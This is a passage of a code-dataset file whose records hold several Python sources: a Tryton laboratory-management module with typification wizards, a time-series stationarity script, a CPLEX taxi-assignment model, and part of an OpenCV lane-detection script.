select=True,\n required=True)\n\n @classmethod\n def __setup__(cls):\n super(AnalysisLabMethod, cls).__setup__()\n cls._error_messages.update({'typificated_method': 'You can not delete method \"%s\" because is typificated'})\n\n @classmethod\n def delete(cls, methods):\n cls.check_delete(methods)\n super(AnalysisLabMethod, cls).delete(methods)\n\n @classmethod\n def check_delete(cls, methods):\n Typification = Pool().get('lims.typification')\n for method in methods:\n typifications = Typification.search_count([\n (\n 'analysis', '=', method.analysis.id),\n (\n 'method', '=', method.method.id),\n ('valid', '=', True)])\n if typifications != 0:\n cls.raise_user_error('typificated_method', (\n method.method.code,))\n\n\nclass AnalysisDevice(ModelSQL, ModelView):\n __doc__ = 'Analysis Device'\n __name__ = 'lims.analysis.device'\n analysis = fields.Many2One('lims.analysis', 'Analysis', required=True, ondelete='CASCADE',\n select=True)\n laboratory = fields.Many2One('lims.laboratory', 'Laboratory', required=True,\n domain=[('id', 'in', Eval('laboratory_domain'))],\n depends=[\n 'laboratory_domain'])\n laboratory_domain = fields.Function(fields.Many2Many('lims.laboratory', None, None, 'Laboratory domain'), 'on_change_with_laboratory_domain')\n device = fields.Many2One('lims.lab.device', 'Device', required=True, domain=[\n (\n 'laboratories.laboratory', '=', Eval('laboratory'))],\n depends=[\n 'laboratory'])\n by_default = fields.Boolean('By default')\n\n @classmethod\n def __setup__(cls):\n super(AnalysisDevice, cls).__setup__()\n cls._error_messages.update({'default_device': 'There is already a default device for this analysis on this laboratory'})\n\n @staticmethod\n def default_by_default():\n return True\n\n @classmethod\n def validate(cls, devices):\n super(AnalysisDevice, cls).validate(devices)\n for d in devices:\n d.check_default()\n\n def check_default(self):\n if self.by_default:\n devices = self.search([\n (\n 'analysis', '=', self.analysis.id),\n (\n 'laboratory', '=', self.laboratory.id),\n ('by_default', '=', True),\n (\n 'id', '!=', self.id)])\n if devices:\n self.raise_user_error('default_device')\n\n @staticmethod\n def default_laboratory_domain():\n return Transaction().context.get('laboratory_domain', [])\n\n @fields.depends('analysis', '_parent_analysis.laboratories', 'laboratory')\n def on_change_with_laboratory_domain(self, name=None):\n laboratories = []\n if self.analysis:\n if self.analysis.laboratories:\n laboratories = [l.laboratory.id for l in self.analysis.laboratories]\n if not laboratories:\n if self.laboratory:\n laboratories = [\n self.laboratory.id]\n return laboratories\n\n @classmethod\n def search_rec_name(cls, name, clause):\n return ['OR',\n ('laboratory.code', ) + tuple(clause[1:]),\n ('laboratory.description', ) + tuple(clause[1:])]\n\n\nclass CopyTypificationStart(ModelView):\n __doc__ = 'Copy/Move Typification'\n __name__ = 'lims.typification.copy.start'\n origin_product_type = fields.Many2One('lims.product.type', 'Product type', required=True)\n origin_matrix = fields.Many2One('lims.matrix', 'Matrix', required=True)\n origin_analysis = fields.Many2One('lims.analysis', 'Analysis', domain=[\n ('state', '=', 'active'),\n ('type', '=', 'analysis'),\n ('behavior', '!=', 'additional')])\n origin_method = fields.Many2One('lims.lab.method', 'Method', states={'required': Bool(Eval('destination_method'))},\n depends=[\n 'destination_method'])\n destination_product_type = fields.Many2One('lims.product.type', 'Product type',\n required=True)\n destination_matrix = 
fields.Many2One('lims.matrix', 'Matrix', required=True)\n destination_method = fields.Many2One('lims.lab.method', 'Method')\n action = fields.Selection([\n ('copy', 'Copy'),\n ('move', 'Move')],\n 'Action',\n required=True, help='If choose , the origin typifications will be deactivated')\n\n @staticmethod\n def default_action():\n return 'copy'\n\n\nclass CopyTypification(Wizard):\n __doc__ = 'Copy/Move Typification'\n __name__ = 'lims.typification.copy'\n start = StateView('lims.typification.copy.start', 'lims.lims_copy_typification_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Confirm', 'confirm', 'tryton-ok', default=True)])\n confirm = StateTransition()\n\n def transition_confirm(self):\n Typification = Pool().get('lims.typification')\n clause = [\n (\n 'product_type', '=', self.start.origin_product_type.id),\n (\n 'matrix', '=', self.start.origin_matrix.id),\n ('valid', '=', True)]\n if self.start.origin_analysis:\n clause.append(('analysis', '=', self.start.origin_analysis.id))\n if self.start.origin_method:\n clause.append(('method', '=', self.start.origin_method.id))\n product_type_id = self.start.destination_product_type.id\n matrix_id = self.start.destination_matrix.id\n method_id = self.start.destination_method.id if self.start.destination_method else None\n origins = Typification.search(clause)\n if origins:\n if self.start.action == 'move':\n Typification.write(origins, {'valid':False, \n 'by_default':False})\n to_copy_1 = []\n to_copy_2 = []\n for origin in origins:\n if Typification.search_count([\n (\n 'product_type', '=', product_type_id),\n (\n 'matrix', '=', matrix_id),\n (\n 'analysis', '=', origin.analysis.id),\n (\n 'method', '=', method_id or origin.method.id)]) != 0:\n continue\n if Typification.search_count([\n ('valid', '=', True),\n (\n 'product_type', '=', product_type_id),\n (\n 'matrix', '=', matrix_id),\n (\n 'analysis', '=', origin.analysis.id),\n ('by_default', '=', True)]) != 0:\n to_copy_1.append(origin)\n else:\n to_copy_2.append(origin)\n\n if to_copy_1:\n default = {'valid':True, 'product_type':product_type_id, \n 'matrix':matrix_id, \n 'by_default':False}\n if method_id:\n default['method'] = method_id\n for r in to_copy_1:\n method_domain = [m.id for m in r.analysis.methods]\n if method_id not in method_domain:\n to_copy_1.remove(r)\n\n Typification.copy(to_copy_1, default=default)\n if to_copy_2:\n default = {'valid':True, 'product_type':product_type_id, \n 'matrix':matrix_id, \n 'by_default':True}\n if method_id:\n default['method'] = method_id\n for r in to_copy_2:\n method_domain = [m.id for m in r.analysis.methods]\n if method_id not in method_domain:\n to_copy_2.remove(r)\n\n Typification.copy(to_copy_2, default=default)\n return 'end'\n\n\nclass CopyCalculatedTypificationStart(ModelView):\n __doc__ = 'Copy Typification'\n __name__ = 'lims.typification.calculated.copy.start'\n origin_product_type = fields.Many2One('lims.product.type', 'Product type', required=True)\n origin_matrix = fields.Many2One('lims.matrix', 'Matrix', required=True)\n origin_analysis = fields.Many2One('lims.analysis', 'Set/Group', required=True,\n domain=[\n ('state', '=', 'active'),\n ('type', 'in', ('set', 'group'))])\n destination_product_type = fields.Many2One('lims.product.type', 'Product type',\n required=True)\n destination_matrix = fields.Many2One('lims.matrix', 'Matrix', required=True)\n\n\nclass CopyCalculatedTypification(Wizard):\n __doc__ = 'Copy Typification'\n __name__ = 'lims.typification.calculated.copy'\n start = 
StateView('lims.typification.calculated.copy.start', 'lims.lims_copy_calculated_typification_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Confirm', 'confirm', 'tryton-ok', default=True)])\n confirm = StateTransition()\n\n def transition_confirm(self):\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n included_analysis_ids = Analysis.get_included_analysis_analysis(self.start.origin_analysis.id)\n if not included_analysis_ids:\n return 'end'\n clause = [\n (\n 'product_type', '=', self.start.origin_product_type.id),\n (\n 'matrix', '=', self.start.origin_matrix.id),\n ('valid', '=', True),\n (\n 'analysis', 'in', included_analysis_ids)]\n product_type_id = self.start.destination_product_type.id\n matrix_id = self.start.destination_matrix.id\n origins = Typification.search(clause)\n to_copy_1 = []\n to_copy_2 = []\n for origin in origins:\n if Typification.search_count([\n (\n 'product_type', '=', product_type_id),\n (\n 'matrix', '=', matrix_id),\n (\n 'analysis', '=', origin.analysis.id),\n (\n 'method', '=', origin.method.id)]) != 0:\n continue\n if Typification.search_count([\n ('valid', '=', True),\n (\n 'product_type', '=', product_type_id),\n (\n 'matrix', '=', matrix_id),\n (\n 'analysis', '=', origin.analysis.id),\n ('by_default', '=', True)]) != 0:\n to_copy_1.append(origin)\n else:\n to_copy_2.append(origin)\n\n if to_copy_1:\n default = {'valid':True, 'product_type':product_type_id, \n 'matrix':matrix_id, \n 'by_default':False}\n Typification.copy(to_copy_1, default=default)\n if to_copy_2:\n default = {'valid':True, 'product_type':product_type_id, \n 'matrix':matrix_id, \n 'by_default':True}\n Typification.copy(to_copy_2, default=default)\n return 'end'\n\n\nclass RelateAnalysisStart(ModelView):\n __doc__ = 'Relate Analysis'\n __name__ = 'lims.relate_analysis.start'\n analysis = fields.Many2Many('lims.analysis', None, None, 'Analysis',\n required=True, domain=[\n (\n 'id', 'in', Eval('analysis_domain'))],\n depends=[\n 'analysis_domain'])\n analysis_domain = fields.One2Many('lims.analysis', None, 'Analysis domain')\n\n\nclass RelateAnalysis(Wizard):\n __doc__ = 'Relate Analysis'\n __name__ = 'lims.relate_analysis'\n start = StateView('lims.relate_analysis.start', 'lims.lims_relate_analysis_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Relate', 'relate', 'tryton-ok', default=True)])\n relate = StateTransition()\n\n @classmethod\n def __setup__(cls):\n super(RelateAnalysis, cls).__setup__()\n cls._error_messages.update({'not_set_laboratory': 'No Laboratory loaded for the Set'})\n\n def default_start(self, fields):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n AnalysisLaboratory = pool.get('lims.analysis-laboratory')\n analysis = Analysis(Transaction().context['active_id'])\n default = {'analysis_domain': []}\n if len(analysis.laboratories) != 1:\n self.raise_user_error('not_set_laboratory')\n cursor.execute('SELECT DISTINCT(al.analysis) FROM \"' + AnalysisLaboratory._table + '\" al INNER JOIN \"' + Analysis._table + '\" a ON a.id = al.analysis WHERE al.laboratory = %s AND a.state = \\'active\\' AND a.type = \\'analysis\\' AND a.end_date IS NULL AND al.analysis != %s', (\n analysis.laboratories[0].laboratory.id, analysis.id))\n res = cursor.fetchall()\n if res:\n default['analysis_domain'] = [x[0] for x in res]\n return default\n\n def transition_relate(self):\n Analysis = Pool().get('lims.analysis')\n analysis = 
Analysis(Transaction().context['active_id'])\n to_create = [{'analysis':analysis.id, 'included_analysis':al.id, 'laboratory':analysis.laboratories[0].laboratory.id} for al in self.start.analysis]\n Analysis.write([analysis], {'included_analysis': [('create', to_create)]})\n return 'end'\n\n\nclass CreateAnalysisProduct(Wizard):\n __doc__ = 'Create Analysis Product'\n __name__ = 'lims.create_analysis_product'\n start = StateTransition()\n\n def transition_start(self):\n pool = Pool()\n Template = pool.get('product.template')\n Product = pool.get('product.product')\n Analysis = pool.get('lims.analysis')\n Template = pool.get('product.template')\n TemplateCategory = pool.get('product.template-product.category')\n Uom = pool.get('product.uom')\n Lang = pool.get('ir.lang')\n Config = pool.get('lims.configuration')\n analysis = Analysis(Transaction().context['active_id'])\n if analysis.type == 'analysis':\n if analysis.behavior == 'internal_relation':\n return 'end'\n if analysis.product:\n return 'end'\n config_ = Config(1)\n uom = Uom.search(['OR',\n ('symbol', '=', 'u'),\n ('symbol', '=', 'x 1 u')])[0]\n template = Template()\n template.name = analysis.description\n template.type = 'service'\n template.list_price = Decimal('1.0')\n template.cost_price = Decimal('1.0')\n template.salable = True\n template.default_uom = uom\n template.sale_uom = uom\n template.account_category = config_.analysis_product_category.id\n template.accounts_category = True\n template.save()\n template_category = TemplateCategory()\n template_category.template = template.id\n template_category.category = config_.analysis_product_category.id\n template_category.save()\n product = Product()\n product.template = template.id\n product.code = analysis.code\n product.save()\n analysis.product = product\n analysis.save()\n lang, = Lang.search([\n ('code', '=', 'en')],\n limit=1)\n with Transaction().set_context(language=(lang.code)):\n template = Template(template.id)\n template.name = Analysis(analysis.id).description\n template.save()\n return 'end'\n\n\nclass OpenTypifications(Wizard):\n __doc__ = 'Open Typifications'\n __name__ = 'lims.scope_version.open_typifications'\n start_state = 'open_'\n open_ = StateAction('lims.act_lims_typification_readonly_list')\n\n def do_open_(self, action):\n cursor = Transaction().connection.cursor()\n TechnicalScopeVersionLine = Pool().get('lims.technical.scope.version.line')\n cursor.execute('SELECT typification FROM \"' + TechnicalScopeVersionLine._table + '\" WHERE version = %s', (\n Transaction().context['active_id'],))\n t_ids = [x[0] for x in cursor.fetchall()]\n action['pyson_domain'] = PYSONEncoder().encode([('id', 'in', t_ids)])\n return (action, {})\n\n\nclass AddTypificationsStart(ModelView):\n __doc__ = 'Add Typifications'\n __name__ = 'lims.scope_version.add_typifications.start'\n typifications = fields.Many2Many('lims.typification.readonly', None,\n None, 'Typifications', required=True)\n\n\nclass AddTypifications(Wizard):\n __doc__ = 'Add Typifications'\n __name__ = 'lims.scope_version.add_typifications'\n start = StateView('lims.scope_version.add_typifications.start', 'lims.scope_version_add_typifications_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Add', 'add', 'tryton-ok', default=True)])\n add = StateTransition()\n\n def transition_add(self):\n TechnicalScopeVersion = Pool().get('lims.technical.scope.version')\n scope_version = TechnicalScopeVersion(Transaction().context['active_id'])\n TechnicalScopeVersion.write([scope_version], 
{'version_lines': [\n ('remove',\n [t.id for t in self.start.typifications])]})\n TechnicalScopeVersion.write([scope_version], {'version_lines': [\n ('add',\n [t.id for t in self.start.typifications])]})\n return 'end'\n\n\nclass RemoveTypificationsStart(ModelView):\n __doc__ = 'Remove Typifications'\n __name__ = 'lims.scope_version.remove_typifications.start'\n typifications = fields.Many2Many('lims.typification.readonly', None,\n None, 'Typifications', required=True, domain=[\n (\n 'id', 'in', Eval('typifications_domain'))],\n depends=[\n 'typifications_domain'])\n typifications_domain = fields.One2Many('lims.typification.readonly', None, 'Typifications domain')\n\n\nclass RemoveTypifications(Wizard):\n __doc__ = 'Remove Typifications'\n __name__ = 'lims.scope_version.remove_typifications'\n start = StateView('lims.scope_version.remove_typifications.start', 'lims.scope_version_remove_typifications_start_view_form', [\n Button('Cancel', 'end', 'tryton-cancel'),\n Button('Remove', 'remove', 'tryton-ok', default=True)])\n remove = StateTransition()\n\n def default_start(self, fields):\n cursor = Transaction().connection.cursor()\n TechnicalScopeVersionLine = Pool().get('lims.technical.scope.version.line')\n cursor.execute('SELECT typification FROM \"' + TechnicalScopeVersionLine._table + '\" WHERE version = %s', (\n Transaction().context['active_id'],))\n t_ids = [x[0] for x in cursor.fetchall()]\n return {'typifications_domain': t_ids}\n\n def transition_remove(self):\n TechnicalScopeVersion = Pool().get('lims.technical.scope.version')\n scope_version = TechnicalScopeVersion(Transaction().context['active_id'])\n TechnicalScopeVersion.write([scope_version], {'version_lines': [\n ('remove',\n [t.id for t in self.start.typifications])]})\n return 'end'","sub_path":"pycfiles/kalenis_lims-5.0.0-py3.7/analysis.cpython-37.py","file_name":"analysis.cpython-37.py","file_ext":"py","file_size_in_byte":87850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"311564949","text":"from time_predict import read_data1\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom pandas import Series,DataFrame\nfrom datetime import datetime\n\n\ndata_read=read_data1.ReadData()\n\ndata=data_read.read_data(1631,'13 12:00:00','13 15:00:00')\n\n\ndatels = [datetime.strptime(x, \"%Y-%m-%d %H:%M:%S\") for x in data['timedata']]\n\ndata['timedata']=datels\nindex=pd.DatetimeIndex(start=data['timedata'].min(),end=data['timedata'].max(),freq='T')\ndata1=DataFrame([None]*len(index),columns=['value'])\ndata1['timedata']=index\n\n\nmerge_data=data1.merge(data,left_on='timedata',right_on='timedata',how='left')\nmerge_data.loc[merge_data['value_y'].isna(),'value_y']=90\nprint(merge_data)\n\ntest_data=Series(merge_data['value_y'])\ntest_data.index=merge_data['timedata']\nplt.plot(test_data.values)\nplt.show()\nfrom statsmodels.tsa.stattools import adfuller\n\n\ndef test_stationarity(timeseries):\n # Determing rolling statistics\n rolmean = timeseries.rolling(12).mean()\n rolstd = timeseries.rolling(12).std()\n # Plot rolling statistics:\n orig = plt.plot(timeseries, color='blue', label='Original')\n mean = plt.plot(rolmean, color='red', label='Rolling Mean')\n std = plt.plot(rolstd, color='black', label='Rolling Std')\n plt.legend(loc='best')\n plt.title('Rolling Mean & Standard Deviation')\n plt.show(block=False)\n\n # Perform Dickey-Fuller test:\n print('Results of Dickey-Fuller Test:')\n dftest = adfuller(timeseries, autolag='AIC')\n dfoutput = pd.Series(dftest[0:4], 
index=['Test Statistic', 'p-value', '#Lags Used', 'Number of Observations Used'])\n    for key, value in dftest[4].items():\n        dfoutput['Critical Value (%s)' % key] = value\n    print(dfoutput)\n\ntest_stationarity(test_data)\n\n\nexpwighted_avg = pd.DataFrame.ewm(test_data, halflife=12).mean()\nplt.plot(test_data)\nplt.plot(expwighted_avg, color='red')\nplt.show()\n\nfrom statsmodels.tsa.seasonal import seasonal_decompose\ndecomposition = seasonal_decompose(test_data)\n\ntrend = decomposition.trend\nseasonal = decomposition.seasonal\nresidual = decomposition.resid\n\nplt.subplot(411)\nplt.plot(test_data, label='Original')\nplt.legend(loc='best')\nplt.subplot(412)\nplt.plot(trend, label='Trend')\nplt.legend(loc='best')\nplt.subplot(413)\nplt.plot(seasonal,label='Seasonality')\nplt.legend(loc='best')\nplt.subplot(414)\nplt.plot(residual, label='Residuals')\nplt.legend(loc='best')\nplt.tight_layout()\nplt.show()","sub_path":"time_predict/arma.py","file_name":"arma.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"414381443","text":"# -*- coding: utf-8 -*-\nimport cplex\nimport numpy as np\nimport pandas as pd\nfrom Instance import Instance\nTOLERANCE = 0.001\n\n\n\n# from Instance import Instance\n# import cplex\n\nEPS = 1e-6\ndef solve_instance_greedy(inst):\n    available = [*range(inst.n)]\n    assigned = []\n\n    for pasx in range(inst.n):\n\n        pas_dists = [*enumerate([inst.dist_matrix[i][pasx] for i in range(inst.n)])]\n        filter_dists = [(i ,j) for i,j in pas_dists if i in available]\n        match = min(filter_dists, key = lambda t: t[1])\n        assigned.append(match)\n        available.remove(match[0])\n    \n    tot_dist = sum([j for i,j in assigned])\n    tuple_selected = [(j,i) for i,j in enumerate([j for j,i in assigned])]\n    \n\n    return [tot_dist, tuple_selected]\n################## FCFS greedy solution ######################\n\n\n###############################################################\n\n################## LP solution ################################\ndef generate_variables_pr(inst, myprob):\n    n_vars_tot = inst.n**2\n    obj = [0]*n_vars_tot\n    lb = [0]*n_vars_tot\n    names = []\n    \n    # var_cnt keeps a running count of how many variables we have added so far.\n    var_cnt = 0\n    # Generate the indices.\n    for i in range(inst.n):\n        for j in range(inst.n):\n            # The two for loops are nested because we need the combinations of (i,j), i = 1,...,m and j = 1,...,n.\n            # Define the value for (i,j). \n            inst.var_idx[(i,j)] = var_cnt\n            # Get the cost.\n            obj[var_cnt] = inst.paxs_tot_fare[j]/(inst.dist_matrix[i][j] + inst.paxs_trip_dist[j] + .01)\n            names.append('x_' + str(i) + str(j))\n            # Increment the next unused index.\n            var_cnt += 1\n\n    # Add the variables to the model.\n    myprob.variables.add(obj = obj, lb = lb, names = names)\n    \n    \n    \n# \t''' Generates the constraint matrix over myprob. Replace pass with the corresponding code.'''\n# \tpass\n\t\t\t\n\ndef generate_constraints_pr(inst, myprob):\n\t \n    # Add the demand constraints one by one.\n    # We iterate over the clients (since this is the demand constraint).\n    for j in range(inst.n):\n        # Generate the indices (which in the end will also have m positions).\n        ind = []\n        taxi = []\n        vals = [1]*inst.n\n        # In each case we append the index of the variable representing arc (i,j), stored in var_idx.\n        for i in range(inst.n):\n            ind.append(inst.var_idx[(i,j)])\n            taxi.append(inst.var_idx[(j,i)])\n\n        # As in the previous cases, we build the row representation from ind and vals and add it.\n        # Note that this is done inside the \"for\", because we want to add one constraint per client.\n        row = [ind,vals]\n        row2 = [taxi, vals]\n        myprob.linear_constraints.add(lin_expr = [row], senses = ['E'], rhs = [1])\n        myprob.linear_constraints.add(lin_expr = [row2], senses = ['E'], rhs = [1])\n\t\n\ndef populate_by_row_pr(inst, myprob):\n    generate_variables_pr(inst, myprob)\n    generate_constraints_pr(inst, myprob)\n    myprob.objective.set_sense(myprob.objective.sense.maximize)\n    myprob.write('out/test_taxis_price.lp')\n\ndef solve_lp_pr(inst):\n\n    # Solve the LP.\n    myprob = cplex.Cplex()\n    populate_by_row_pr(inst,myprob)\n    myprob.solve()\n\n    # Get the solution info.\n    x = myprob.solution.get_values()\n    f_obj = myprob.solution.get_objective_value()\n\n\n    # get optimal i,j \n    opt_i_j = np.reshape(np.array(myprob.solution.get_values()),(inst.n,inst.n))\n    # get distances made\n    d_made = sum(np.array(inst.dist_matrix) * opt_i_j)\n    # get total dist\n    total_dist = sum(d_made)\n    \n    return total_dist\n    \n###############################################################\n\n#### Implement the auxiliary functions needed to analyze results and propose improvements.\n\ndef main():\n    results = []\n    inst_types = ['small','medium','large','xl']\n    n_inst = ['0','1','2','3','4','5','6','7','8','9']\n    for t in inst_types:\n\n#Outline for running the solutions directly on the 40 instances.\n    \n        for n in n_inst:\n            inst_file = 'input/' + t + '_' + n + '.csv'\n            inst = Instance(inst_file)\n            f_greedy, x_greedy= solve_instance_greedy(inst)\n            f_lp = solve_lp_pr(inst)\n            \n            results.append([inst_file,f_greedy, f_lp])\n    \n    pd.DataFrame(results).to_csv('out/results_price_km.csv')\n    \n    \n\t\t\t \n\n# Modify to adjust the format to the group's convenience, adding\n# or removing information.\n    \n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n\n\n\n\n\n","sub_path":"price_km.py","file_name":"price_km.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"434872776","text":"import cv2\nimport numpy as np\nfrom collections import deque\nimport pickle\nfrom moviepy.editor import *\nimport matplotlib.pyplot as plt\n\n# src_points = np.float32([[490, 482], [810, 482], [1250, 720], [40, 720]])\n# dest_points = np.float32([[0, 0], [1280, 0], [1250, 720], [40, 720]])\nsrc_points = np.float32([[545, 460], [735, 460], [1280, 700], [0, 700]])\ndest_points = np.float32([[0, 0], [1280, 0], [1280, 720], [0, 720]])\nundistort_mtx_dist = pickle.load(open(\"../pickle_saved/pickle_un_distortion.p\", \"rb\"))\nmtx = undistort_mtx_dist[\"mtx\"]\ndist = undistort_mtx_dist[\"dist\"]\n\n\nclass Line:\n    def __init__(self):\n        # was the line detected in the last iteration?\n        self.detected = False\n        # x values of the last n fits of 
the line\n # self.recent_xfitted = []\n self.recent_xfitted = deque(maxlen=10)\n # average x values of the fitted line over the last n iterations\n self.bestx = None\n # polynomial coefficients averaged over the last n iterations\n self.best_fit = None\n # polynomial coefficients for the most recent fit\n self.current_fit = [np.array([False])]\n # radius of curvature of the line in some units\n self.radius_of_curvature = None\n # distance in meters of vehicle center from the line\n self.line_base_pos = None\n # difference in fit coefficients between last and new fits\n self.diffs = np.array([0, 0, 0], dtype='float')\n # x values for detected line pixels\n self.allx = None\n # y values for detected line pixels\n self.ally = None\n # width of window while detecting pixels of line\n self.margin = 50\n # Minimum number of pixels found to recenter window\n self.minpix = 10\n # Number of windows to be searched for\n self.nwindows = 9\n\n def rad_of_curvature(self):\n ym_per_pix = 30. / 720 # meters per pixel in y dimension\n xm_per_pix = 3.7 / 900 # meteres per pixel in x dimension\n fit_curvature = np.polyfit(self.ally * ym_per_pix, self.allx * xm_per_pix, 2)\n curvature_radius = ((1 + (2 * fit_curvature[0] * np.max(self.allx) + fit_curvature[1]) ** 2) ** 1.5) \\\n / np.absolute(2 * fit_curvature[0])\n return curvature_radius\n\n def histogram_edges(self, binary_warped):\n nonzero = binary_warped.nonzero()\n nonzeroy = np.array(nonzero[0])\n nonzerox = np.array(nonzero[1])\n window_height = np.int(binary_warped.shape[0] / self.nwindows)\n histogram = np.sum(binary_warped[binary_warped.shape[0] // 2:, :], axis=0)\n midpoint = np.int(histogram.shape[0] / 2)\n leftx_base = np.argmax(histogram[:midpoint])\n rightx_base = np.argmax(histogram[midpoint:]) + midpoint\n leftx_current = leftx_base\n rightx_current = rightx_base\n left_lane_inds = []\n right_lane_inds = []\n for window in range(self.nwindows):\n # Identify window boundaries in x and y (and right and left)\n win_y_low = binary_warped.shape[0] - (window + 1) * window_height\n win_y_high = binary_warped.shape[0] - window * window_height\n win_xleft_low = leftx_current - self.margin\n win_xleft_high = leftx_current + self.margin\n win_xright_low = rightx_current - self.margin\n win_xright_high = rightx_current + self.margin\n # Identify the nonzero pixels in x and y within the window\n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]\n # Append these indices to the lists\n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n # If you found > minpix pixels, recenter next window on their mean position\n if len(good_left_inds) > self.minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > self.minpix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n if np.sum(left_lane_inds) != 0:\n self.detected = True\n else:\n self.detected = False\n return leftx, lefty, rightx, righty\n\n # def detect_edges_prev_values(self):\n\n\nleft_line = Line()\nright_line = Line()\n\n\ndef 
birds_eye_view(img):\n rows, cols, depth = img.shape\n\n M = cv2.getPerspectiveTransform(src_points, dest_points)\n warped = cv2.warpPerspective(img, M, (cols, rows), flags=cv2.INTER_LINEAR)\n\n return warped\n\n\ndef find_lines(binary_warped):\n leftx, lefty, rightx, righty = left_line.histogram_edges(binary_warped)\n\n # Fit a second order polynomial to each\n # Find new coefficients with average left and right fits\n left_fit = np.polyfit(lefty, leftx, 2)\n right_fit = np.polyfit(righty, rightx, 2)\n left_line.current_fit = left_fit\n right_line.current_fit = right_fit\n\n # Find left and right x intercepts with the coefficients\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_fit[0] * ploty ** 2 + left_fit[1] * ploty + left_fit[2]\n right_fitx = right_fit[0] * ploty ** 2 + right_fit[1] * ploty + right_fit[2]\n\n # Add the x intercepts to the last intercepts\n left_line.recent_xfitted.append(left_fitx)\n right_line.recent_xfitted.append(right_fitx)\n\n # Average the left and right fits\n left_fit_avg = np.mean(left_line.recent_xfitted, 0)\n right_fit_avg = np.mean(right_line.recent_xfitted, 0)\n\n # Set points of X and Y\n left_line.allx = left_fit_avg\n left_line.ally = ploty\n\n right_line.allx = right_fit_avg\n right_line.ally = ploty\n\n # Find new coefficients with the last n average iterations\n left_line.best_fit = np.polyfit(ploty, left_fit_avg, 2)\n right_line.best_fit = np.polyfit(ploty, right_fit_avg, 2)\n\n left_line.radius_of_curvature = left_line.rad_of_curvature()\n right_line.radius_of_curvature = right_line.rad_of_curvature()\n\n\ndef create_final_image(image, binary_warped, mean_radius, pos_of_car):\n # Create an image to draw the lines on\n warp_zero = np.zeros_like(binary_warped).astype(np.uint8)\n color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n ploty = np.linspace(0, binary_warped.shape[0] - 1, binary_warped.shape[0])\n left_fitx = left_line.best_fit[0] * ploty ** 2 + left_line.best_fit[1] * ploty + left_line.best_fit[2]\n right_fitx = right_line.best_fit[0] * ploty ** 2 + right_line.best_fit[1] * ploty + right_line.best_fit[2]\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n pts = np.hstack((pts_left, pts_right))\n\n # Draw the lane onto the warped blank image\n cv2.fillPoly(color_warp, np.int_([pts]), (0, 255, 0))\n\n src = np.float32([[490, 482], [810, 482], [1250, 720], [40, 720]])\n dst = np.float32([[0, 0], [1280, 0], [1250, 720], [40, 720]])\n Minv = cv2.getPerspectiveTransform(dst, src)\n\n # Warp the blank back to original image space using inverse perspective matrix (Minv)\n newwarp = cv2.warpPerspective(color_warp, Minv, (binary_warped.shape[1], binary_warped.shape[0]))\n result = cv2.addWeighted(image, 1, newwarp, 0.3, 0)\n cv2.putText(result, \"Mean Radius: \" + str(mean_radius), (400, 70), cv2.FONT_ITALIC, 1, (255, 255, 255), 2, cv2.LINE_AA)\n cv2.putText(result, \"Car Position: \" + str(pos_of_car), (400, 100), cv2.FONT_ITALIC, 1, (255, 255, 255), 2, cv2.LINE_AA)\n return result\n\n\ndef abs_sobel_thresh(img, orient='x', sobel_kernel=3, thresh=(0, 255)):\n # Calculate directional gradient\n # Apply threshold\n # gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n if orient == 'x':\n sobel = cv2.Sobel(img, cv2.CV_64F, 1, 0, ksize=sobel_kernel)\n else:\n sobel = cv2.Sobel(img, cv2.CV_64F, 0, 1, ksize=sobel_kernel)\n abs_sobel = 
